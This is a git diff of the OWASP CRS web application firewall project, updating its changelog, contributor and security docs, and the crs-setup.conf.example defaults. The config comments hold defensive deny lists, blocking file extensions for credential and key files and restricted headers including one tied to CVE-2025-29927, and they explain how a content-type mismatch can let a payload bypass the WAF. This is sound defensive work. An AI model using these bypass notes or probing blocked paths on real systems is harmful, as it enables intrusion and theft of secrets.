+* fix: use proper capture for log output of 932300 by @theseion in https://github.com/coreruleset/coreruleset/pull/3763
+* chore: use lowercase character class for 932320 by @theseion in https://github.com/coreruleset/coreruleset/pull/3772
+* fix: remove nonnecessary variable (932260 PL1) by @dune73 in https://github.com/coreruleset/coreruleset/pull/3773
+
+## New Contributors
+* @aryehb made their first contribution in https://github.com/coreruleset/coreruleset/pull/3755
+
+**Full Changelog**: https://github.com/coreruleset/coreruleset/compare/v4.4.0...v4.5.0
 
 ## Version 4.4.0 - 2024-06-23
 
@@ -579,6 +772,18 @@ Functionality that has been moved to plugins for this release:
  * fix: wordPress: fix FPs in Site Health page (now a plugin) (Robert de Boer, Fregf, Walter Hop) [#1895, #1920]
  * fix: xenForo: fix FPs (now a plugin) (Walter Hop, ThanhPT) [#1844, #1865, #1894, #1998, #2421]
 
+## Version 3.3.7 - 2024-10-28
+
+### ⭐ Important changes
+* fix: 9EA-241022 v3 by @RedXanadu in https://github.com/coreruleset/coreruleset/pull/3906
+
+## Version 3.3.6 - 2024-08-27
+
+Important changes:
+
+* Backport fix for 3MU-240701-1 - catch invalid character in multipart headers via new rule 922130 (Ervin Hegedus, Felipe Zipitría)
+* Backport fix for 3MU-240701-2 - prevent using backslash in file names from v4 - updated rule 920120 - pl1, 920121 - pl2 (Felipe Zipitria)
+
 ## Version 3.3.5 - 2023-07-18
 
 Important changes:
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index d556c40e4..070c2bbd1 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -268,7 +268,7 @@ Optimizing regular expressions is hard. Often, a change intended to improve the
 mailto|mms|mumble|maven
 ```
 
-An optimized version (produced by the [crs-toolchain]({{< ref "crs_toolchain" >}})) could look like this:
+An optimized version (produced by the [crs-toolchain](https://github.com/coreruleset/crs-toolchain)) could look like this:
 
 ```python
 m(?:a(?:ilto|ven)|umble|ms)
@@ -276,7 +276,7 @@ m(?:a(?:ilto|ven)|umble|ms)
 
 The above expression is an optimization because it reduces the number of backtracking steps when a branch fails. The regular expressions in the CRS are often comprised of lists of tens or even hundreds of words. Reading such an expression in an optimized form is difficult: even the _simple_ optimized example above is difficult to read.
 
-In general, contributors should not try to optimize contributed regular expressions and should instead strive for clarity. New regular expressions will usually be required to be submitted as a `.ra` file for the [crs-toolchain]({{< ref "crs_toolchain" >}}) to process. In such a file, the regular expression is decomposed into individual parts, making manual optimizations much harder or even impossible (and unnecessary with the `crs-toolchain`). The `crs-toolchain` performs some common optimizations automatically, such as the one shown above.
+In general, contributors should not try to optimize contributed regular expressions and should instead strive for clarity. New regular expressions will usually be required to be submitted as a `.ra` file for the [crs-toolchain](https://github.com/coreruleset/crs-toolchain) to process. In such a file, the regular expression is decomposed into individual parts, making manual optimizations much harder or even impossible (and unnecessary with the `crs-toolchain`). The `crs-toolchain` performs some common optimizations automatically, such as the one shown above.
 
 Whether optimizations make sense in a contribution is assessed for each case individually.
 
@@ -363,7 +363,7 @@ Rule tests also provide an excellent way to test WAF engines and implementations
 
 The rule tests are located under `tests/regression/tests`. Each CRS rule *file* has a corresponding *directory* and each individual *rule* has a corresponding *YAML file* containing all the tests for that rule. For example, the tests for rule 911100 *(Method is not allowed by policy)* are in the file `REQUEST-911-METHOD-ENFORCEMENT/911100.yaml`.
 
-Full documentation of the required formatting and available options of the YAML tests can be found at https://github.com/coreruleset/ftw/blob/main/docs/YAMLFormat.md.
+Full documentation of the required formatting and available options of the YAML tests can be found in the SPECs at https://github.com/coreruleset/ftw-tests-schema/tree/main/spec. Be aware that the spec is evolving and the latest versions will be supported by the latests versions of the test engine.
 
 Documentation on how to run the CRS test suite can be found in the [online documentation](https://coreruleset.org/docs/development/testing/).
 
@@ -442,20 +442,24 @@ The older method of using `raw_request` is deprecated as it's difficult to maint
 
 ### Using The Correct HTTP Endpoint
 
-The CRS project uses [kennthreitz/httpbin](https://hub.docker.com/r/kennethreitz/httpbin) as the backend server for tests. This backend provides one dedicated endpoint for each HTTP method. Tests should target these endpoints to:
+The CRS project uses [albedo](https://github.com/coreruleset/albedo) as the backend server for tests. Albedo is a simple HTTP server used as a reverse-proxy backend in testing web application firewalls (WAFs).
 
 - improve test throughput (prevent HTML from being returned by the backend)
 - add automatic HTTP method verification (the backend will respond with status code `405` (method not allowed) to requests whose method does not match the endpoint)
 
+These are the supported endpoints by albedo: https://github.com/coreruleset/albedo/?tab=readme-ov-file#endpoints
+
 Test URIs should be structured as follows, where `<method>` must be replaced by the name of the HTTP method the test uses:
 
 ```yaml
 #...
           method: <method>
-          uri: /<method>/some/arbitrary/url
+          uri: /<your url>
 #...
 ```
 
+If you are writing a test for a response rule, take a look at the `/reflect` endpoint on how to use it.
+
 ## Further Guidance on Rule Writing
 
 ### Leaving Audit Log Configuration Unchanged
@@ -467,4 +471,4 @@ Former versions of CRS dynamically included the HTTP response body in the audit
 * Remove trailing spaces from files (if they're not needed). This will make linters happy.
 * EOF should have an EOL.
 
-The `pre-commit` framework can be used to check for and fix these issues automatically. First, go to the [pre-commit](https://pre-commit.com/) website and download the framework. Then, after installing, use the command `pre-commit install` so that the tools are installed and run each time a commit is made. CRS provides a config file that will keep the repository clean.
+The `pre-commit` framework can be used to check for and fix these issues automatically. First, go to the [pre-commit](https://pre-commit.com/) website and download the framework. Then, after installing, use the command `pre-commit install` so that the tools are installed and run each time a commit is made. CRS provides a config file that will keep the repository clean. We are also running `pre-commit` in our pipeline, so it will catch common errors.
diff --git a/CONTRIBUTORS.md b/CONTRIBUTORS.md
index beef1f8f3..df0d2e672 100644
--- a/CONTRIBUTORS.md
+++ b/CONTRIBUTORS.md
@@ -2,17 +2,16 @@
 
 ## Project Co-Leads:
 
-- [Christian Folini](https://github.com/dune73)
 - [Felipe Zipitría](https://github.com/fzipi)
+- [Max Leske](https://github.com/theseion)
 
 ## Developers:
 
 - [Franziska Bühler](https://github.com/franbuehler)
 - [Esad Cetiner](https://github.com/esadcetiner)
+- [Christian Folini](https://github.com/dune73)
 - [Ervin Hegedus](https://github.com/airween)
 - [Andrew Howe](https://github.com/RedXanadu)
-- [Karel Knibbe](https://github.com/karelorigin)
-- [Max Leske](https://github.com/theseion)
 - [Matteo Pace](https://github.com/M4tteoP)
 - [Jitendra Patro](https://github.com/Xhoenix)
 - [Jozef Sudolský](https://github.com/azurit)
@@ -27,9 +26,14 @@
 - [Chaim Sanders](https://github.com/csanders-git)
 - [Federico G. Schwindt](https://github.com/fgsch)
 - [Simon Studer](https://github.com/studersi)
+- [Karel Knibbe](https://github.com/karelorigin)
 
 ## Contributors:
 
+- [Thibault Soubiran](https://github.com/S0obi)
+- [OhMyVolk](https://github.com/OhMyVolk)
+- [evidencebp](https://github.com/evidencebp)
+- [mtaket](https://github.com/mtaket)
 - [luelueking](https://github.com/luelueking)
 - [agusmu](https://github.com/agusmu)
 - [Amir Hosein Aliakbarian](https://github.com/AmirHoseinAliakbarian)
@@ -80,6 +84,7 @@
 - [na1ex](https://github.com/na1ex)
 - [Jose Nazario](https://github.com/paralax)
 - [Scott O'Neil](https://github.com/cPanelScott)
+- [Lucas Ostmann](https://github.com/lostmann-owl-it)
 - [NiceYouKnow](https://github.com/NiceYouKnow)
 - [nobletrout](https://github.com/nobletrout)
 - [Fernando Outeda](https://github.com/fog94)
@@ -105,6 +110,7 @@
 - [Timo](https://github.com/ntimo)
 - [Juan-Pablo Tosso](https://github.com/jptosso)
 - [vijayasija99](https://github.com/vijayasija99)
+- [Dany Volk](https://github.com/OhMyVolk)
 - [Ben Williams](https://github.com/benwilliams)
 - [Anna Winkler](https://github.com/annawinkler)
 - [Avery Wong](https://github.com/4v3r9)
diff --git a/INSTALL.md b/INSTALL.md
index 19eb0ac9f..476506d46 100644
--- a/INSTALL.md
+++ b/INSTALL.md
@@ -8,8 +8,6 @@ The first step is to download the CRS itself. The CRS project strongly recommend
 
 Official CRS releases can be found at the following URL: https://github.com/coreruleset/coreruleset/releases.
 
-For *production* environments, it is recommended to use the latest release, which is v4.0.0. For *testing* the bleeding edge CRS version, nightly releases are also provided.
-
 ### Verifying Releases
 
 {{% notice note %}}
diff --git a/LICENSE b/LICENSE
index 5dbb91909..baf1ccc93 100644
--- a/LICENSE
+++ b/LICENSE
@@ -186,7 +186,7 @@
       same "printed page" as the copyright notice for easier
       identification within third-party archives.
 
-   Copyright 2024 OWASP CRS project
+   Copyright 2025 OWASP CRS project
 
    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
diff --git a/README.md b/README.md
index ea0319ea7..7560b5567 100644
--- a/README.md
+++ b/README.md
@@ -14,21 +14,23 @@ The OWASP CRS is a set of generic attack detection rules for use with ModSecurit
 
 ## CRS Resources
 
-Please see the [OWASP CRS page](https://coreruleset.org/) to get introduced to the CRS and view resources on installation, configuration, and working with the CRS.
+Please see the [OWASP CRS page](https://coreruleset.org/) to get introduced to CRS and view resources on installation, configuration, and working with CRS.
 
-## Contributing to the CRS
+## Contributing to CRS
 
-We strive to make the OWASP ModSecurity CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false-positive alert reports, evasions, usability issues, and suggestions for new detections.
+We strive to make the OWASP CRS accessible to a wide audience of beginner and experienced users. We are interested in hearing any bug reports, false-positive alert reports, evasions, usability issues, and suggestions for new detections.
 
-[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your ModSecurity audit log. We will try and address your issue and potentially ask for additional information to reproduce your problem. Please also note that stale issues will be flagged and closed after 120 days. You can search for stale issues with the following [search query](https://github.com/coreruleset/coreruleset/issues?q=label%3A%22Stale+issue%22).
+[Create an issue on GitHub](https://github.com/coreruleset/coreruleset/issues) to report a false positive or false negative (evasion). Please include your installed version and the relevant portions of your audit log. We will try and address your issue and potentially ask for additional information to reproduce your problem. Please also note that stale issues will be flagged and closed after 120 days. You can search for stale issues with the following [search query](https://github.com/coreruleset/coreruleset/issues?q=label%3A%22Stale+issue%22).
 
 [Sign up for our Google Group](https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project) to ask general usage questions and participate in discussions on the CRS. Also [here](https://lists.owasp.org/pipermail/owasp-modsecurity-core-rule-set/index) you can find the archives for the previous mailing list.
 
 [Join the #coreruleset channel on OWASP Slack](https://owasp.slack.com/) to chat about the CRS. ([Click here](https://owasp.org/slack/invite) to get an invitation if you are not yet registered on the OWASP slack. It's open to non-members too.)
 
+Read also our documentation on [how to contribute](./CONTRIBUTING.md).
+
 ## License
 
 Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.</br>
-Copyright (c) 2021-2024 CRS project. All rights reserved.
+Copyright (c) 2021-2025 CRS project. All rights reserved.
 
 The OWASP CRS is distributed under Apache Software License (ASL) version 2. Please see the enclosed LICENSE file for full details.
diff --git a/SECURITY.md b/SECURITY.md
index d91d6d53a..ff1280449 100644
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -11,12 +11,9 @@ Along those lines, OWASP CRS team may not issue security notifications for unsup
 
 | Version   | Supported          |
 | --------- | ------------------ |
-| 4.5.x     | :white_check_mark: |
-| 4.4.x     | :white_check_mark: |
-| 4.3.x     | :x: |
-| 4.2.x     | :x: |
-| 4.1.x     | :x: |
-| 4.0.x     | :x: |
+| 4.14.z    | :white_check_mark: |
+| 4.13.z    | :white_check_mark: |
+| 4.y.z     | :x: |
 | 3.3.x     | :white_check_mark: |
 | 3.2.x     | :x:                |
 | 3.1.x     | :x:                |
@@ -56,7 +53,7 @@ Primary key fingerprint: 3600 6F0E 0BA1 6783 2158  8211 38EE ACA1 AB8A 6E72
 If the signature was good, the verification succeeded. If you see a warning like the above, it means you know our public key, but you are not trusting it. You can trust it by using the following method:
 
 ```bash
-gpg edit-key 36006F0E0BA167832158821138EEACA1AB8A6E72
+gpg --edit-key 36006F0E0BA167832158821138EEACA1AB8A6E72
 gpg> trust
 Your decision: 5 (ultimate trust)
 Are you sure: Yes
diff --git a/crs-setup.conf.example b/crs-setup.conf.example
index 721e8fd42..8e2ea6869 100644
--- a/crs-setup.conf.example
+++ b/crs-setup.conf.example
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -37,8 +37,8 @@
 #
 # The CRS assumes that modsecurity.conf has been loaded. It is bundled with
 # ModSecurity. If you don't have it, you can get it from:
-# 2.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v2/master/modsecurity.conf-recommended
-# 3.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended
+# 2.x: https://raw.githubusercontent.com/owasp-modsecurity/ModSecurity/v2/master/modsecurity.conf-recommended
+# 3.x: https://raw.githubusercontent.com/owasp-modsecurity/ModSecurity/v3/master/modsecurity.conf-recommended
 #
 # The order of file inclusion in your webserver configuration should always be:
 # 1. modsecurity.conf
@@ -181,7 +181,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.blocking_paranoia_level=1"
 
 
@@ -209,7 +209,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.detection_paranoia_level=1"
 
 
@@ -235,7 +235,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.enforce_bodyproc_urlencoded=1"
 
 
@@ -270,7 +270,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.critical_anomaly_score=5,\
 #    setvar:tx.error_anomaly_score=4,\
 #    setvar:tx.warning_anomaly_score=3,\
@@ -324,7 +324,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.inbound_anomaly_score_threshold=5,\
 #    setvar:tx.outbound_anomaly_score_threshold=4"
 
@@ -385,7 +385,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.reporting_level=4"
 
 
@@ -417,7 +417,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.early_blocking=1"
 
 
@@ -438,7 +438,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.enable_default_collections=1"
 
 
@@ -459,6 +459,16 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # Example: for WebDAV, add the following methods: CHECKOUT COPY DELETE LOCK
 #          MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK
 # Uncomment this rule to change the default.
+#
+# The HTTP PUT method is normally used to upload data that is saved on the server at a user-supplied URL.
+# If enabled, an attacker may be able to inject arbitrary, and potentially malicious, content into the application or on to the file system of the web server.
+# Depending on the server's configuration, this may lead to compromise of other users (by uploading
+# client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.
+# For this reason, the PUT method is disabled by default.
+# GET, HEAD, POST and OPTIONS are seen as the minimal set of HTTP methods
+# from a security perspective. For static sites, removing the POST is
+# recommended. Add other HTTP methods as seen fit (see above).
+#
 #SecAction \
 #    "id:900200,\
 #    phase:1,\
@@ -466,13 +476,12 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
 
 # Content-Types that a client is allowed to send in a request.
-# Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related|
-# |text/xml| |application/xml| |application/soap+xml| |application/json|
-# |application/cloudevents+json| |application/cloudevents-batch+json|
+# Default: |application/x-www-form-urlencoded| |multipart/form-data| |text/xml|
+# |application/xml| |application/soap+xml| |application/json|
 #
 # Please note, that the rule where CRS uses this variable (920420) evaluates it with operator
 # `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom
@@ -484,22 +493,38 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc..)
 # could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain"
 # content type may still be interpreted as JSON by a backend application but would not trigger the
-# JSON body parser at the WAF, leading to a bypass.
+# JSON body parser at the WAF, leading to a bypass. To avoid bypasses, you must enable the appropriate
+# body parser based on the expected data in the request bodies (For example JSON for JSON data, XML for XML data, etc).
+#
+# When additional JSON content types are legitimately used in a deployment,
+# e.g. application/cloudevents+json, it is extremely important to ensure that a
+# rule exists to enable the engine's JSON body processor for these additional
+# JSON content types. Failure to do so can lead to a request body bypass. The
+# default JSON rule in modsecurity.conf-recommended (200001) will only activate
+# the JSON body processor for the specific content type application/json. The
+# optional modsecurity.conf-recommended rule 200006 can be used to enable the
+# JSON body processor for a wide variety of JSON content types.
 #
 # To prevent blocking request with not allowed content-type by default, you can create an exclusion
-# rule that removes rule 920420. For example:
-#SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \
+# rule that removes rule 920420. It's important that you enable the correct body parser when allowing
+# an additional content type to prevent bypasses. For example, this rule enables the JSON body processor
+# for the text/plain content type:
+#SecRule REQUEST_HEADERS:Content-Type "@beginsWith text/plain" \
 #    "id:1234,\
 #    phase:1,\
 #    pass,\
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ctl:ruleRemoveById=920420,\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    chain"
 #    SecRule REQUEST_URI "@rx ^/foo/bar" \
-#        "t:none"
+#        "t:none,\
+#        ctl:ruleRemoveById=920420,\
+#        ctl:requestBodyProcessor=JSON"
+#
+# See: https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#ctl
+# See: https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v3.x)#ctl
 #
 # Uncomment this rule to change the default.
 #
@@ -510,8 +535,8 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
-#    setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"
+#    ver:'OWASP_CRS/4.15.0-dev',\
+#    setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |text/xml| |application/xml| |application/soap+xml| |application/json|'"
 
 # Allowed HTTP versions.
 # Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0
@@ -526,12 +551,12 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0'"
 
 # Forbidden file extensions.
 # Guards against unintended exposure of development/configuration files.
-# Default: .asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pem/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/
+# Default: .ani/ .asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .compositefont/ .config/ .conf/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .scr/ .sct/ .shs/ .sql/ .swp/ .sys/ .tlb/ .tmp/ .url/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/
 # Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/
 # Note that .axd was removed due to false positives (see PR 1925).
 #
@@ -550,8 +575,8 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
-#    setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pem/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'"
+#    ver:'OWASP_CRS/4.15.0-dev',\
+#    setvar:'tx.restricted_extensions=.ani/ .asa/ .asax/ .ascx/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .compositefont/ .config/ .conf/ .crt/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dist/ .dll/ .dos/ .dpkg-dist/ .drv/ .gadget/ .hta/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .inf/ .ini/ .jse/ .key/ .licx/ .lnk/ .log/ .mdb/ .msc/ .ocx/ .old/ .pass/ .pdb/ .pfx/ .pif/ .pem/ .pol/ .prf/ .printer/ .pwd/ .rdb/ .rdp/ .reg/ .resources/ .resx/ .scr/ .sct/ .shs/ .sql/ .swp/ .sys/ .tlb/ .tmp/ .url/ .vb/ .vbe/ .vbs/ .vbproj/ .vsdisco/ .vxd/ .webinfo/ .ws/ .wsc/ .wsf/ .wsh/ .xsd/ .xsx/'"
 
 # Restricted request headers.
 # The HTTP request headers that CRS restricts are split into two categories:
@@ -561,7 +586,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 # [ Basic ]
 # Includes deprecated headers and headers with known security risks. Always
 # forbidden.
-# Default: /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/
+# Default: /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ /x-middleware-subrequest/
 #
 # /content-encoding/
 #   Used to list any encodings that have been applied to the original payload.
@@ -587,6 +612,9 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #   Blocking these headers prevents method override attacks, as described here:
 #   https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it
 #
+# /x-middleware-subrequest/
+#   CVE-2025-29927 (Next.js)
+#
 # Uncomment this rule to change the default.
 #SecAction \
 #    "id:900250,\
@@ -595,8 +623,8 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
-#    setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/'"
+#    ver:'OWASP_CRS/4.15.0-dev',\
+#    setvar:'tx.restricted_headers_basic=/content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ /x-http-method-override/ /x-http-method/ /x-method-override/ /x-middleware-subrequest/'"
 #
 # [ Extended ]
 # Includes deprecated headers that are still in use (so false positives are
@@ -621,11 +649,16 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:'tx.restricted_headers_extended=/accept-charset/'"
 
 # Content-Types charsets that a client is allowed to send in a request.
 # The content-types are enclosed by |pipes| as delimiters to guarantee exact matches.
+#
+# You can add additional character sets if something more exotic is required. One caveat: you will also need to edit 'regex-assembly/include/allowed-charsets.ra' and rebuild all the associated regular expressions using `crs-toolchain regex update --all`. See https://coreruleset.org/docs/6-development/6-2-crs-toolchain/.
+#
+# Warning: If the WAF engine is unable to fully and correctly decode a newly added character encoding then this can lead to a full request body or response body bypass. Additional permitted character encodings should be added with caution and tested to ensure inspection is not affected.
+#
 # Default: |utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|
 # Uncomment this rule to change the default.
 #SecAction \
@@ -635,7 +668,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:'tx.allowed_request_content_type_charset=|utf-8| |iso-8859-1| |iso-8859-15| |windows-1252|'"
 
 #
@@ -661,7 +694,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.max_num_args=255"
 
 # Block request if the length of any argument name is too high
@@ -675,7 +708,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.arg_name_length=100"
 
 # Block request if the length of any argument value is too high
@@ -689,7 +722,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.arg_length=400"
 
 # Block request if the total length of all combined arguments is too high
@@ -703,7 +736,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.total_arg_length=64000"
 
 # Block request if the file size of any individual uploaded file is too high
@@ -717,7 +750,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.max_file_size=1048576"
 
 # Block request if the total size of all combined uploaded files is too high
@@ -731,7 +764,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.combined_file_sizes=1048576"
 
 
@@ -771,7 +804,7 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    pass,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.sampling_percentage=100"
 
 
@@ -792,9 +825,30 @@ SecDefaultAction "phase:2,log,auditlog,pass"
 #    t:none,\
 #    nolog,\
 #    tag:'OWASP_CRS',\
-#    ver:'OWASP_CRS/4.6.0',\
+#    ver:'OWASP_CRS/4.15.0-dev',\
 #    setvar:tx.crs_validate_utf8_encoding=1"
 
+# -- [[ Skip Checking Responses ]] ------------------------------------------------
+#
